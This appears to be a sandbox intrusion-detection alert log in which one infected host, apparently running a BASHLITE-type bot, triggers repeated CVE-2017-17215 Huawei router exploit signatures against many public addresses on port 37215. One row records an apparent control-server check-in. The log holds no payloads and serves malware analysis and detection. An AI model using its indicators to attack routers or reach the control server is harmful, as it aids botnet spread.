                                            06/14/24-10:43:54.202577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4520037215192.168.2.14156.167.179.22
                                            06/14/24-10:43:45.967653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3364037215192.168.2.14197.117.174.235
                                            06/14/24-10:43:54.183476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4983437215192.168.2.14197.222.80.165
                                            06/14/24-10:44:33.134413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3567237215192.168.2.14156.209.216.179
                                            06/14/24-10:44:24.913307TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5757837215192.168.2.14156.98.245.221
                                            06/14/24-10:43:50.072740TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3967837215192.168.2.14197.93.107.155
                                            06/14/24-10:43:37.758888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3312437215192.168.2.1441.117.173.189
                                            06/14/24-10:43:39.788615TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5883837215192.168.2.14156.53.161.228
                                            06/14/24-10:43:54.182648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6007637215192.168.2.14156.196.38.96
                                            06/14/24-10:43:50.114826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6014037215192.168.2.14156.253.49.179
                                            06/14/24-10:44:33.150471TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4220437215192.168.2.14156.191.8.185
                                            06/14/24-10:44:06.470703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3479037215192.168.2.14197.144.167.48
                                            06/14/24-10:44:24.932878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4831437215192.168.2.1441.82.198.31
                                            06/14/24-10:43:50.114075TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3293637215192.168.2.14197.170.176.187
                                            06/14/24-10:43:58.275439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4485637215192.168.2.14197.79.227.238
                                            06/14/24-10:44:35.178064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5477037215192.168.2.14197.22.16.220
                                            06/14/24-10:43:45.989009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4018837215192.168.2.14197.54.200.150
                                            06/14/24-10:44:33.131258TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5428037215192.168.2.14197.28.217.22
                                            06/14/24-10:44:16.732100TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4206437215192.168.2.1441.95.217.28
                                            06/14/24-10:43:50.074991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3675037215192.168.2.1441.93.248.61
                                            06/14/24-10:43:52.148956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3720637215192.168.2.1441.242.245.179
                                            06/14/24-10:44:22.882806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5803037215192.168.2.1441.27.48.32
                                            06/14/24-10:44:31.089675TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4255437215192.168.2.1441.215.228.137
                                            06/14/24-10:44:14.685541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3718837215192.168.2.14197.241.44.26
                                            06/14/24-10:43:50.073087TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5569037215192.168.2.14156.13.20.184
                                            06/14/24-10:43:54.184883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5057237215192.168.2.14197.132.225.46
                                            06/14/24-10:44:04.412277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5964837215192.168.2.1441.204.124.195
                                            06/14/24-10:43:58.295328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3797837215192.168.2.1441.117.109.171
                                            06/14/24-10:44:24.942252TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3957237215192.168.2.14156.151.116.94
                                            06/14/24-10:44:06.453903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3387837215192.168.2.1441.125.228.170
                                            06/14/24-10:44:16.734143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4046837215192.168.2.14156.232.171.137
                                            06/14/24-10:44:00.322749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4157837215192.168.2.1441.219.36.229
                                            06/14/24-10:44:04.422241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4289437215192.168.2.14197.76.92.18
                                            06/14/24-10:43:36.729585TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5089037215192.168.2.1441.241.231.209
                                            06/14/24-10:44:16.732821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4503037215192.168.2.1441.24.103.46
                                            06/14/24-10:44:08.503381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5311637215192.168.2.1441.238.53.32
                                            06/14/24-10:44:04.412227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3333837215192.168.2.14156.15.23.33
                                            06/14/24-10:43:52.145775TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4012837215192.168.2.14156.52.27.79
                                            06/14/24-10:44:31.052622TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3394037215192.168.2.14156.72.121.192
                                            06/14/24-10:44:00.337717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6037837215192.168.2.14156.113.244.240
                                            06/14/24-10:44:22.859680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5080437215192.168.2.14197.247.223.46
                                            06/14/24-10:44:29.011030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4927037215192.168.2.14197.176.208.236
                                            06/14/24-10:44:29.014085TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5600237215192.168.2.1441.217.212.149
                                            06/14/24-10:44:02.369123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3721637215192.168.2.1441.186.100.60
                                            06/14/24-10:44:29.024728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3739837215192.168.2.14156.199.100.48
                                            06/14/24-10:44:33.131772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4184437215192.168.2.14156.0.244.0
                                            06/14/24-10:43:52.165358TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4393837215192.168.2.14156.217.17.57
                                            06/14/24-10:43:48.031610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3635437215192.168.2.1441.39.73.212
                                            06/14/24-10:44:29.022972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3858437215192.168.2.14197.154.250.209
                                            06/14/24-10:44:29.014724TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5213637215192.168.2.14156.164.146.140
                                            06/14/24-10:43:56.250476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5780437215192.168.2.14156.79.145.165
                                            06/14/24-10:43:45.991720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5711037215192.168.2.14156.211.218.206
                                            06/14/24-10:44:12.013435TCP2840515ETPRO TROJAN ELF/BASHLITE Variant Reporting Arch Type (i586)3872423192.168.2.1443.231.232.101
                                            06/14/24-10:44:04.421485TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3837837215192.168.2.14156.17.172.121
                                            06/14/24-10:44:12.640589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5350637215192.168.2.14156.7.104.177
                                            06/14/24-10:43:37.762902TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5414037215192.168.2.1441.152.236.8
                                            06/14/24-10:44:22.858871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4838237215192.168.2.1441.164.209.227
                                            06/14/24-10:44:26.980214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4710837215192.168.2.1441.209.159.211
                                            06/14/24-10:44:26.999358TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4776437215192.168.2.14197.74.68.69
                                            06/14/24-10:44:31.052423TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3450637215192.168.2.14156.180.228.42
                                            06/14/24-10:44:04.408526TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4059637215192.168.2.1441.217.175.224
                                            06/14/24-10:44:04.411427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3581637215192.168.2.1441.210.193.53
                                            06/14/24-10:44:35.176828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4465837215192.168.2.14197.117.120.18
                                            06/14/24-10:43:41.897246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4408237215192.168.2.1441.198.151.33
                                            06/14/24-10:43:39.790502TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6002437215192.168.2.14156.209.203.71
                                            06/14/24-10:44:18.779661TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5891637215192.168.2.14197.7.254.2
                                            06/14/24-10:43:36.724192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4929037215192.168.2.1441.221.232.180
                                            06/14/24-10:43:43.941570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5547037215192.168.2.14156.252.85.75
                                            06/14/24-10:43:39.791329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5302637215192.168.2.1441.7.203.252
                                            06/14/24-10:43:39.811561TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3958637215192.168.2.1441.230.65.60
                                            06/14/24-10:44:00.324821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3915237215192.168.2.14156.124.160.138
                                            06/14/24-10:43:45.990428TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3403637215192.168.2.14156.127.168.173
                                            06/14/24-10:44:06.469956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5788637215192.168.2.1441.52.190.142
                                            06/14/24-10:44:27.000023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5315437215192.168.2.1441.91.26.113
                                            06/14/24-10:43:54.202426TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4264237215192.168.2.14197.234.174.183
                                            06/14/24-10:43:48.030299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3661837215192.168.2.14197.221.76.19
                                            06/14/24-10:44:06.472830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3774637215192.168.2.1441.221.133.107
                                            06/14/24-10:44:10.565436TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3819037215192.168.2.14197.8.146.25
                                            06/14/24-10:44:04.420552TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5168037215192.168.2.14156.185.155.240
                                            06/14/24-10:44:08.504166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5064237215192.168.2.14197.184.70.176
                                            06/14/24-10:43:54.202148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3691437215192.168.2.14156.112.103.139
                                            06/14/24-10:44:02.381745TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4979437215192.168.2.14197.28.246.205
                                            06/14/24-10:44:29.027273TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4056037215192.168.2.14156.105.194.91
                                            06/14/24-10:43:50.073880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3799037215192.168.2.14156.218.48.135
                                            06/14/24-10:44:04.407102TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3753837215192.168.2.1441.144.106.107
                                            06/14/24-10:44:16.716299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4055037215192.168.2.1441.12.254.129
                                            06/14/24-10:44:02.368013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4566637215192.168.2.1441.86.128.109
                                            06/14/24-10:44:02.368522TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4975837215192.168.2.1441.134.120.168
                                            06/14/24-10:44:31.084031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5388837215192.168.2.14197.6.32.153
                                            06/14/24-10:44:14.668969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6073837215192.168.2.14156.92.9.180
                                            06/14/24-10:44:02.368978TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5977637215192.168.2.1441.3.215.186
                                            06/14/24-10:43:52.149930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4474637215192.168.2.1441.196.31.59
                                            06/14/24-10:44:33.132186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4052237215192.168.2.14197.89.14.185
                                            06/14/24-10:44:02.368037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5895437215192.168.2.14156.91.172.206
                                            06/14/24-10:44:06.470278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5188037215192.168.2.1441.232.157.97
                                            06/14/24-10:44:00.322377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4652237215192.168.2.14156.203.54.210
                                            06/14/24-10:44:26.978584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3580837215192.168.2.1441.66.27.217
                                            06/14/24-10:43:48.028050TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5959837215192.168.2.14156.166.185.216
                                            06/14/24-10:44:18.779099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4272637215192.168.2.14156.222.116.55
                                            06/14/24-10:43:45.987209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5954637215192.168.2.14156.127.92.201
                                            06/14/24-10:43:36.729360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5577637215192.168.2.1441.198.192.16
                                            06/14/24-10:43:36.726702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3292637215192.168.2.14197.246.63.1
                                            06/14/24-10:44:00.324725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3971237215192.168.2.14197.104.65.201
                                            06/14/24-10:43:39.813456TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3902237215192.168.2.14197.131.143.27
                                            06/14/24-10:44:18.779502TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4925437215192.168.2.14197.222.149.183
                                            06/14/24-10:43:37.763368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5733837215192.168.2.1441.196.87.137
                                            06/14/24-10:44:14.671484TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5459637215192.168.2.1441.192.236.4
                                            06/14/24-10:44:33.151852TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5701037215192.168.2.14156.64.243.142
                                            06/14/24-10:44:16.715230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5985437215192.168.2.14156.60.204.212
                                            06/14/24-10:44:24.942702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6037237215192.168.2.14156.121.173.127
                                            06/14/24-10:44:24.941657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3883837215192.168.2.14197.212.170.203
                                            06/14/24-10:44:33.152553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3363237215192.168.2.14156.51.35.195
                                            06/14/24-10:43:52.150424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4666037215192.168.2.1441.58.87.72
                                            06/14/24-10:44:16.715716TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5849237215192.168.2.14156.177.82.28
                                            06/14/24-10:43:45.969529TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4635437215192.168.2.14197.41.250.156
                                            06/14/24-10:44:00.325748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3612037215192.168.2.14197.36.66.198
                                            06/14/24-10:44:35.179720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4237237215192.168.2.1441.157.90.251
                                            06/14/24-10:44:24.943725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4666837215192.168.2.14156.48.51.225
                                            06/14/24-10:44:08.504869TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4549837215192.168.2.1441.11.99.99
                                            06/14/24-10:43:54.198333TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3637437215192.168.2.14197.24.222.11
                                            06/14/24-10:43:48.015498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6033037215192.168.2.1441.189.139.194
                                            06/14/24-10:43:50.072035TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4855437215192.168.2.14156.24.153.66
                                            06/14/24-10:43:45.968205TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5725837215192.168.2.1441.98.190.111
                                            06/14/24-10:44:10.565351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4497437215192.168.2.14197.68.79.64
                                            06/14/24-10:43:52.160848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4881237215192.168.2.14197.171.217.57
                                            06/14/24-10:43:39.788741TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5668237215192.168.2.14156.15.196.99
                                            06/14/24-10:44:04.421896TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4531437215192.168.2.14197.150.210.132
                                            06/14/24-10:44:20.806672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3466237215192.168.2.1441.225.42.223
                                            06/14/24-10:44:02.366215TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5601437215192.168.2.14197.34.133.22
                                            06/14/24-10:43:41.850299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3872437215192.168.2.1441.145.16.189
                                            06/14/24-10:43:43.941962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5392037215192.168.2.14156.53.72.143
                                            06/14/24-10:44:16.716522TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3635837215192.168.2.1441.248.139.209
                                            06/14/24-10:43:52.142947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5541037215192.168.2.14197.82.80.37
                                            06/14/24-10:44:02.381126TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3427437215192.168.2.1441.88.233.156
                                            06/14/24-10:43:45.991672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5045637215192.168.2.1441.80.114.7
                                            06/14/24-10:43:39.808414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5675837215192.168.2.14197.128.166.29
                                            06/14/24-10:43:48.016156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4826237215192.168.2.14197.109.253.54
                                            06/14/24-10:43:48.017759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3971237215192.168.2.1441.73.188.33
                                            06/14/24-10:43:56.246146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3747437215192.168.2.14156.56.119.200
                                            06/14/24-10:43:58.277239TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5425037215192.168.2.1441.195.34.188
                                            06/14/24-10:44:33.133045TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3724037215192.168.2.1441.168.146.143
                                            06/14/24-10:43:36.722553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6044837215192.168.2.14156.28.121.91
                                            06/14/24-10:44:02.369389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3986837215192.168.2.1441.57.38.222
                                            06/14/24-10:43:50.069738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4369437215192.168.2.1441.52.242.36
                                            06/14/24-10:44:04.412022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3618037215192.168.2.14197.172.215.220
                                            06/14/24-10:44:06.473448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4570237215192.168.2.14156.92.14.136
                                            06/14/24-10:44:10.567315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3834237215192.168.2.14197.161.54.147
                                            06/14/24-10:44:31.086757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4698437215192.168.2.14197.61.29.5
                                            06/14/24-10:44:04.411713TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3686837215192.168.2.14156.254.228.115
                                            06/14/24-10:44:20.803939TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4756637215192.168.2.1441.71.133.110
                                            06/14/24-10:44:16.717971TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4793437215192.168.2.1441.4.162.239
                                            06/14/24-10:44:35.183260TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5915037215192.168.2.14156.120.45.138
                                            06/14/24-10:44:24.915243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3453237215192.168.2.14156.79.255.58
                                            06/14/24-10:44:26.999487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4369037215192.168.2.1441.110.150.90
                                            06/14/24-10:44:20.828278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5969837215192.168.2.14156.132.99.156
                                            06/14/24-10:44:04.411526TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3848037215192.168.2.1441.86.12.250
                                            06/14/24-10:44:22.861383TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5073837215192.168.2.14156.164.75.79
                                            06/14/24-10:43:36.700431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6084637215192.168.2.14197.78.104.164
                                            06/14/24-10:43:34.677505TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5209037215192.168.2.14197.73.108.89
                                            06/14/24-10:43:56.227988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4155437215192.168.2.14156.197.236.222
                                            06/14/24-10:44:20.807232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5859837215192.168.2.14156.133.39.52
                                            06/14/24-10:44:02.369039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5534237215192.168.2.1441.3.86.96
                                            06/14/24-10:44:00.340988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4521037215192.168.2.14197.68.191.35
                                            06/14/24-10:44:10.549117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4078437215192.168.2.14197.165.178.157
                                            06/14/24-10:44:14.668157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4971637215192.168.2.14197.34.147.180
                                            06/14/24-10:43:45.965879TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5581637215192.168.2.14156.201.53.67
                                            06/14/24-10:44:26.999920TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4455637215192.168.2.14197.121.54.225
                                            06/14/24-10:44:14.682602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4792037215192.168.2.14156.166.44.228
                                            06/14/24-10:43:36.702313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5591037215192.168.2.1441.157.209.94
                                            06/14/24-10:43:58.289152TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6030437215192.168.2.1441.123.209.164
                                            06/14/24-10:44:31.052582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5901637215192.168.2.14156.246.10.170
                                            06/14/24-10:44:33.151673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5593037215192.168.2.1441.225.25.23
                                            06/14/24-10:43:48.031284TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4717037215192.168.2.1441.30.222.173
                                            06/14/24-10:44:18.762573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4968437215192.168.2.14197.60.150.175
                                            06/14/24-10:43:41.846879TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5928237215192.168.2.1441.141.32.32
                                            06/14/24-10:44:14.685448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4087837215192.168.2.14197.20.5.50
                                            06/14/24-10:43:39.808077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5974637215192.168.2.14156.165.119.187
                                            06/14/24-10:44:08.519711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3792037215192.168.2.1441.250.133.178
                                            06/14/24-10:43:48.029650TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3562437215192.168.2.14197.250.236.119
                                            06/14/24-10:43:43.972503TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3378437215192.168.2.1441.197.56.56
                                            06/14/24-10:43:56.245020TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4159637215192.168.2.14156.199.174.241
                                            06/14/24-10:43:58.276547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5355237215192.168.2.1441.227.41.53
                                            06/14/24-10:43:52.143523TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5106037215192.168.2.1441.237.136.184
                                            06/14/24-10:44:00.341374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5102237215192.168.2.1441.11.106.140
                                            06/14/24-10:44:26.979684TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3865437215192.168.2.14156.38.136.68
                                            06/14/24-10:44:06.471934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3606837215192.168.2.1441.208.191.17
                                            06/14/24-10:44:24.943669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4324037215192.168.2.1441.121.253.76
                                            06/14/24-10:43:34.660938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4482637215192.168.2.1441.229.152.150
                                            06/14/24-10:43:56.253766TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5189437215192.168.2.1441.149.24.255
